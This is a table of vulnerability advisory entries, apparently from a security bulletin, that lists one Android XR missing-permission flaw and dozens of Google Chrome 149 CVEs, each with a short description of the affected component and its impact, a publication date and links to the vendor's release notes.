| Google--Android XR | In addInputMethodListener of com.android.server.inputmethod.InputMethodManagerService, there is a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0072 | https://source.android.com/docs/security/bulletin/xr/2026/2026-06-01 |
| Google--Chrome | Out of bounds read and write in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10881 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498904293 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10882 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503420443 |
| Google--Chrome | Type Confusion in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10883 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503768143 |
| Google--Chrome | Use after free in Chromecast in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10884 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503617302 |
| Google--Chrome | Use after free in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10885 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504072665 |
| Google--Chrome | Use after free in FileSystem in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10886 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505096898 |
| Google--Chrome | Use after free in Chromoting in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10887 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505204771 |
| Google--Chrome | Use after free in Cast Streaming in Google Chrome prior to 149.0.7827.53 allowed an attacker on the local network segment to execute arbitrary code via malicious network traffic. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10888 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505815080 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10889 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513003797 |
| Google--Chrome | Use after free in Cast in Google Chrome prior to 149.0.7827.53 allowed an attacker on the local network segment to potentially exploit heap corruption via malicious network traffic. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10890 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513136593 |
| Google--Chrome | Use after free in GFX in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10891 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513160681 |
| Google--Chrome | Out of bounds write in GPU in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10892 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513165325 |
| Google--Chrome | Use after free in Chromoting in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10893 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513231432 |
| Google--Chrome | Use after free in Printing in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10894 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513445101 |
| Google--Chrome | Use after free in Ozone in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10895 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513454018 |
| Google--Chrome | Use after free in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10896 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513514692 |
| Google--Chrome | Inappropriate implementation in GPU in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10897 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513543143 |
| Google--Chrome | Stack buffer overflow in GPU in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10898 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513946753 |
| Google--Chrome | Use after free in Ozone in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10899 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/516653777 |
| Google--Chrome | Use after free in Passwords in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10900 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/516878683 |
| Google--Chrome | Use after free in Passwords in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10901 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/516957738 |
| Google--Chrome | Use after free in Ozone in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10902 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/517046249 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10903 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503422316 |
| Google--Chrome | Inappropriate implementation in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10904 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506855825 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10905 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/487357841 |
| Google--Chrome | Use after free in WebAuthentication in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10906 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503420438 |
| Google--Chrome | Out of bounds write in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10907 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/489071023 |
| Google--Chrome | Use after free in FullScreen in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10908 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505045913 |
| Google--Chrome | Use after free in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10909 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/508092644 |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10910 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/508811477 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10911 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495819067 |
| Google--Chrome | Insufficient validation of untrusted input in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10912 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496614553 |
| Google--Chrome | Use after free in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10913 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497450927 |
| Google--Chrome | Use after free in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10914 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497574371 |
| Google--Chrome | Use after free in Core in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10915 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497612174 |
| Google--Chrome | Insufficient validation of untrusted input in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10916 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497643690 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10917 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497929481 |
| Google--Chrome | Use after free in Viz in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10918 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498259721 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10919 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498872764 |
| Google--Chrome | Insufficient validation of untrusted input in WebShare in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10920 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498977444 |
| Google--Chrome | Integer overflow in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10921 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499159695 |
| Google--Chrome | Insufficient validation of untrusted input in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to bypass same origin policy via malicious network traffic. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10922 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499164652 |
| Google--Chrome | Use after free in WebAppInstalls in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to execute arbitrary code via a malicious file. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10923 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499423683 |
| Google--Chrome | Integer overflow in Chromecast in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10924 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500055357 |
| Google--Chrome | Out of bounds write in Skia in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10925 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500071763 |
| Google--Chrome | Use after free in Cast in Google Chrome prior to 149.0.7827.53 allowed an attacker on the local network segment to execute arbitrary code via malicious network traffic. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10926 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500075522 |
| Google--Chrome | Out of bounds read in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10927 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500090141 |
| Google--Chrome | Script injection in Headless in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10928 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500124367 |
| Google--Chrome | Heap buffer overflow in ANGLE in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10929 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500429259 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10930 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500472605 |
| Google--Chrome | Use after free in FileSystem in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10931 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501115599 |
| Google--Chrome | Use after free in UI in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10932 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501335606 |
| Google--Chrome | Use after free in Audio in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10933 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501557633 |
| Google--Chrome | Use after free in Autofill in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10934 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501594107 |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10935 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501898683 |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10936 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502439789 |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10937 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502651056 |
| Google--Chrome | Inappropriate implementation in Input in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10938 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502681591 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10939 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503502607 |
| Google--Chrome | Race in Codecs in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10940 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503879873 |
| Google--Chrome | Out of bounds memory access in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10941 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503958940 |
| Google--Chrome | Inappropriate implementation in UI in Google Chrome on Windows prior to 149.0.7827.53 allowed a local attacker to perform privilege escalation via a malicious file. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10942 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504104263 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10943 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504194151 |
| Google--Chrome | Insufficient policy enforcement in Autofill in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10944 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504215814 |
| Google--Chrome | Use after free in PDF in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10945 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504417768 |
| Google--Chrome | Heap buffer overflow in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10946 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504587797 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10947 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504597736 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10948 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504599749 |
| Google--Chrome | Heap buffer overflow in Video in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10949 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504644843 |
| Google--Chrome | Insufficient policy enforcement in Autofill in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10950 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505123022 |
| Google--Chrome | Use after free in Autofill in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10951 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505191883 |
| Google--Chrome | Use after free in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10952 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505231370 |
| Google--Chrome | Use after free in Core in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10953 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506147564 |
| Google--Chrome | Use after free in Actor in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10954 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506150628 |
| Google--Chrome | Type Confusion in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10955 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506374676 |
| Google--Chrome | Use after free in MimeHandlerView in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10956 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506375731 |
| Google--Chrome | Use after free in Glic in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10957 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506377279 |
| Google--Chrome | Use after free in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10958 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/507251069 |
| Google--Chrome | Use after free in Input in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10959 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/507258648 |
| Google--Chrome | Uninitialized Use in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10960 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/507258786 |
| Google--Chrome | Use after free in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10961 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/508281950 |
| Google--Chrome | Type Confusion in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10962 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511006880 |
| Google--Chrome | Integer overflow in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10963 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511218177 |
| Google--Chrome | Integer overflow in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10964 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511228272 |
| Google--Chrome | Integer overflow in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10965 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511290038 |
